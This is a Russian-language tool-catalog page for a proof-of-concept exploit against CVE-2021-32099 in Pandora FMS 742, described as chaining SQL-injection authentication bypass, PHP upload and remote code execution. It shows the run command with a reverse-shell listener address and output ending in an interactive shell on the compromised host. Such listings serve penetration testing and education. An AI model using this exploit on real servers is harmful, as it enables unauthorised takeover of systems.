Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-32099 — PoC for CVE-2021-32099 | Kitploit
Инструменты/GitHubGitHub/magicrc/cve-2021-32099
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmagicrc/cve-2021-32099

CVE-2021-32099

PoC for CVE-2021-32099

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2021-32099 PoC

Этот репозиторий содержит доказательство концепции (PoC) эксплойта для уязвимости CVE-2021-32099, затрагивающей Pandora FMS 742. Эксплойт показывает, как неаутентифицированный злоумышленник может использовать SQL-инъекцию для повышения привилегий неавторизованной сессии до уровня администратора. Имея административный доступ, злоумышленник может загрузить произвольный PHP-файл через File Manager Pandora FMS, что приводит к удаленному выполнению кода и компрометации сервера от имени пользователя веб-сервера.


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот проект предназначен исключительно для образовательных, исследовательских и авторизованных целей тестирования безопасности.
Не используйте этот код в системах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.
Автор не несет ответственности за любой ущерб или неправомерное использование.


Установка

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt

Использование

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py                                                           
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]

options:
  --target TARGET  Полный URL уязвимого экземпляра Pandora FMS.
  --lhost LHOST    IP-адрес, на который будет подключаться обратная оболочка (должен быть достижим из цели). Слушатель будет привязываться к 0.0.0.0.
  --lport LPORT    Номер порта, к которому будет привязываться слушатель обратной оболочки.

Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444

Пример

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:59:07 up 17:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$  
Скачать инструмент